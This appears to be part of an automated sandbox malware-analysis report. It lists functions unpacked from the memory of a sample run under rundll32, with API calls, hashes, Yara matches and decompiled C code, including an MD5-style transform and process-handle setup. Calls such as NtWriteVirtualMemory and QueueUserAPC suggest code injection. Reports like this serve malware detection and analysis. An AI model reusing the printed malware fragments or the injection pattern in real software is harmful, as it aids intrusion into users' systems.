                                          • Opcode ID: d71670f4f0d47e6b8ee5162f8976482ae545be047ce9f37f04df5584ba0101a5
                                          • Instruction ID: 7f0b44e4e46af0668d9f5f1e00cfec7f70a7c8444c18b1b56a0edef31d20ffe1
                                          • Opcode Fuzzy Hash: d71670f4f0d47e6b8ee5162f8976482ae545be047ce9f37f04df5584ba0101a5
                                          • Instruction Fuzzy Hash: 4F319371A41209AFDB20DF64D898BAAB7F8FB14305F1045EAE959E7250EB309E488B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B58FA6 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: 6fe05e4cc781211d64a70dbaf47a410b9843d59e9dbf4bb8f47ec014ac7f0c43
                                          • Instruction ID: 59c6038b5fd0836440428241347fe351c254ca55c4554ee86849d3dac073891b
                                          • Opcode Fuzzy Hash: 6fe05e4cc781211d64a70dbaf47a410b9843d59e9dbf4bb8f47ec014ac7f0c43
                                          • Instruction Fuzzy Hash: A5F1CF30500B99DFCB31CF69C5847AABBF4FF51302F2449EDC9E696681D632AA49CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489515F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0489515F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x489a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x489a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x489a2f8 = _t6;
					 *0x489a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x489a2f4 = _t7;
					if(_t7 == 0) {
						 *0x489a2f4 =  *0x489a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04895167
                                          0x0489516d
                                          0x04895174
                                          0x00000000
                                          0x048951ce
                                          0x04895176
                                          0x0489517e
                                          0x0489518b
                                          0x0489518b
                                          0x048951cb
                                          0x00000000
                                          0x048951cb
                                          0x0489518d
                                          0x0489518d
                                          0x04895192
                                          0x048951a4
                                          0x048951a9
                                          0x048951af
                                          0x048951b5
                                          0x048951bc
                                          0x048951be
                                          0x048951be
                                          0x00000000
                                          0x048951c5
                                          0x04895187
                                          0x00000000
                                          0x00000000
                                          0x04895189
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04893D54,?), ref: 04895167
                                          • GetVersion.KERNEL32 ref: 04895176
                                          • GetCurrentProcessId.KERNEL32 ref: 04895192
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 048951AF
                                          • GetLastError.KERNEL32 ref: 048951CE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 29702e69294bccf96b6fcc3e6a5e105e9212a6900795bca329914edde1be0e1b
                                          • Instruction ID: 8b9ae80f29458d175045d991300c3aad852c56d4522651466f79dbf7acdc9781
                                          • Opcode Fuzzy Hash: 29702e69294bccf96b6fcc3e6a5e105e9212a6900795bca329914edde1be0e1b
                                          • Instruction Fuzzy Hash: EAF081B1640F02BBDF295F65AC19B143BA0E744745F1C4E19E522CA2C4EFB9AC40CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65188 Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00B651DE
                                          • lstrlenW.KERNEL32(?), ref: 00B651EC
                                          • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00B65217
                                          • lstrcpyW.KERNEL32(00000006,00000000), ref: 00B65245
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Query$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3961825720-0
                                          • Opcode ID: cd8d208941127b69a19df9f9bede38017b5a9005bcbba00f8cfd6001b41bb878
                                          • Instruction ID: f916edde627179eeb826b08bcdf2983611c8822368f7b9a4591b7812877379be
                                          • Opcode Fuzzy Hash: cd8d208941127b69a19df9f9bede38017b5a9005bcbba00f8cfd6001b41bb878
                                          • Instruction Fuzzy Hash: F4411871500609FFDB219FA8CC85AAEBBB9EF04314F1040A9F909A7260DB75EE61DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B54DF5 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00B79208,00000001), ref: 00B54E19
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E64
                                            • Part of subcall function 00B66B34: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00B5A82F), ref: 00B66B4B
                                            • Part of subcall function 00B66B34: QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B60
                                            • Part of subcall function 00B66B34: GetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B6B
                                            • Part of subcall function 00B66B34: TerminateThread.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B75
                                            • Part of subcall function 00B66B34: CloseHandle.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B7C
                                            • Part of subcall function 00B66B34: SetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B85
                                          • GetLastError.KERNEL32(00B5C7AE,00000000,00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E4C
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B54E5C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                          • String ID:
                                          • API String ID: 1700061692-0
                                          • Opcode ID: 4bde763aa86a75edbfa088a9f7c510ccceeda35e246ba56d27281a7f6b9ebfcc
                                          • Instruction ID: 0f7df36b7799693ca6d85e53d4c9135d438a4761ce563e18c6c249bb6be62823
                                          • Opcode Fuzzy Hash: 4bde763aa86a75edbfa088a9f7c510ccceeda35e246ba56d27281a7f6b9ebfcc
                                          • Instruction Fuzzy Hash: C3F0A471341351BFE3145BA8AC89F6677A8EB85336F1101B4FA2AD32E0CB600C9A8674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6264B Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00B6265F
                                          • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00B6269F
                                            • Part of subcall function 00B6B628: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00001003,00B57B0A,00000000,?,00B57B0A,00001003,00000000,00000000,00000318,00000020,?,00010003,00001003), ref: 00B6B646
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B626A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                          • String ID:
                                          • API String ID: 4036914670-0
                                          • Opcode ID: 9d8f7122d5744e2132ef62b10552a0365f76d6e4d215231ece1cb1dcaac1ea9d
                                          • Instruction ID: b2bfcb8501612d1efbc6bc5646e15fc59dab65a9719168587b32c0b7e844260a
                                          • Opcode Fuzzy Hash: 9d8f7122d5744e2132ef62b10552a0365f76d6e4d215231ece1cb1dcaac1ea9d
                                          • Instruction Fuzzy Hash: CD016D36A00108FFFB10ABA5DD05DEEBBFEEB84701F100065FA01E2061EB39D9549B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B51B92 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00B51BC3
                                          • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00B51BFA
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                          • String ID:
                                          • API String ID: 2533303245-0
                                          • Opcode ID: 663c25cdf7784784b827befbcc2442c8e018be2f2ef5c62d327338c77dc7e26c
                                          • Instruction ID: ffa01627ab612a70994222a807994427c010decc4eea52a517b1d479fc143cb8
                                          • Opcode Fuzzy Hash: 663c25cdf7784784b827befbcc2442c8e018be2f2ef5c62d327338c77dc7e26c
                                          • Instruction Fuzzy Hash: B501D132902124ABD7219B9D8D08FAFBAE9DF85B53F1608D4FD05A7100FB358E4896E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A085 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B5A0A4
                                          • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00B5A0BC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationProcessQuerymemset
                                          • String ID:
                                          • API String ID: 2040988606-0
                                          • Opcode ID: 09ba2f2805815cf85d77ec20492186ff5419bd7eb5d7eedeb9962c8d45ceeaea
                                          • Instruction ID: 91e2f3e711a8805f2a4d0ffac65cebdd632f520223e1f47618e0e300131e593c
                                          • Opcode Fuzzy Hash: 09ba2f2805815cf85d77ec20492186ff5419bd7eb5d7eedeb9962c8d45ceeaea
                                          • Instruction Fuzzy Hash: FCF044769002186ADB10DA91CC45FDE7BACDB04740F0480A0BE08E6191D774DB598BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6C1C2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00B6C1EF
                                          • SetLastError.KERNEL32(00000000,?,00B528F4,?,?,?,00000040,?), ref: 00B6C1F6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$LastStatus
                                          • String ID:
                                          • API String ID: 4076355890-0
                                          • Opcode ID: 07b88243fde26b7c127a5ea24ee32e36843b727d0304d0062b5e33eea8e3cad6
                                          • Instruction ID: ac4b8bb9d8124f860192b84753e2aa8ae4b62aeb7d642ec65e8873ab3808c9d3
                                          • Opcode Fuzzy Hash: 07b88243fde26b7c127a5ea24ee32e36843b727d0304d0062b5e33eea8e3cad6
                                          • Instruction Fuzzy Hash: 21E09A3620021AABCF115FE9AC08D9A7FA9EB1D751B004421BE59E3131DB35D9A1ABE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6C3A9 Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B6C783
                                          • memset.NTDLL ref: 00B6C792
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B6190D
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B61919
                                            • Part of subcall function 00B618FC: memset.NTDLL ref: 00B61944
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                          • Instruction ID: 677ccda9d6a63e718cf0634be936bad48e7cc14c935dfed78920d4b73bd15bc4
                                          • Opcode Fuzzy Hash: 4270f02eb92defb9d83c35f2a1f3120725169ebc5706e52a5930cd2b77a8110b
                                          • Instruction Fuzzy Hash: 68020E71501B618FCB79CF29C690526BBF1BF647107609EAEC6E786A90D639F881CF04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489198A Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 49%
                                          			E0489198A(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                          0x0489198d
                                          0x04891998
                                          0x0489199b
                                          0x0489199e
                                          0x0489199f
                                          0x048919bd
                                          0x048919bf
                                          0x048919c2
                                          0x048919c5
                                          0x048919c5
                                          0x048919c8
                                          0x048919c8
                                          0x048919cb
                                          0x048919cb
                                          0x048919ce
                                          0x048919ce
                                          0x048919eb
                                          0x048919ee
                                          0x04891a04
                                          0x04891a07
                                          0x04891a21
                                          0x04891a24
                                          0x04891a3a
                                          0x04891a3d
                                          0x04891a3f
                                          0x04891a57
                                          0x04891a5a
                                          0x04891a5d
                                          0x04891a75
                                          0x04891a78
                                          0x04891a92
                                          0x04891a95
                                          0x04891aab
                                          0x04891aae
                                          0x04891ab0
                                          0x04891ac8
                                          0x04891acd
                                          0x04891ad0
                                          0x04891ae6
                                          0x04891ae9
                                          0x04891b03
                                          0x04891b06
                                          0x04891b1c
                                          0x04891b1f
                                          0x04891b21
                                          0x04891b3c
                                          0x04891b3f
                                          0x04891b56
                                          0x04891b59
                                          0x04891b5d
                                          0x04891b76
                                          0x04891b79
                                          0x04891b7b
                                          0x04891b7e
                                          0x04891b99
                                          0x04891b9c
                                          0x04891bb5
                                          0x04891bb8
                                          0x04891bc8
                                          0x04891bcb
                                          0x04891be3
                                          0x04891be6
                                          0x04891c00
                                          0x04891c03
                                          0x04891c1b
                                          0x04891c1e
                                          0x04891c34
                                          0x04891c37
                                          0x04891c4f
                                          0x04891c52
                                          0x04891c6a
                                          0x04891c6d
                                          0x04891c87
                                          0x04891c8a
                                          0x04891ca0
                                          0x04891ca3
                                          0x04891cbb
                                          0x04891cbe
                                          0x04891cd8
                                          0x04891cdb
                                          0x04891cf3
                                          0x04891cf6
                                          0x04891d0c
                                          0x04891d0f
                                          0x04891d27
                                          0x04891d2a
                                          0x04891d42
                                          0x04891d45
                                          0x04891d57
                                          0x04891d5a
                                          0x04891d6c
                                          0x04891d6f
                                          0x04891d81
                                          0x04891d84
                                          0x04891d88
                                          0x04891d98
                                          0x04891d9b
                                          0x04891da9
                                          0x04891dac
                                          0x04891dbe
                                          0x04891dc1
                                          0x04891dd5
                                          0x04891dd8
                                          0x04891dda
                                          0x04891dea
                                          0x04891ded
                                          0x04891dff
                                          0x04891e02
                                          0x04891e10
                                          0x04891e13
                                          0x04891e25
                                          0x04891e28
                                          0x04891e2c
                                          0x04891e3c
                                          0x04891e3f
                                          0x04891e51
                                          0x04891e54
                                          0x04891e62
                                          0x04891e65
                                          0x04891e77
                                          0x04891e7a
                                          0x04891e8c
                                          0x04891e8f
                                          0x04891ea3
                                          0x04891ea6
                                          0x04891eba
                                          0x04891ebd
                                          0x04891ed1
                                          0x04891ed4
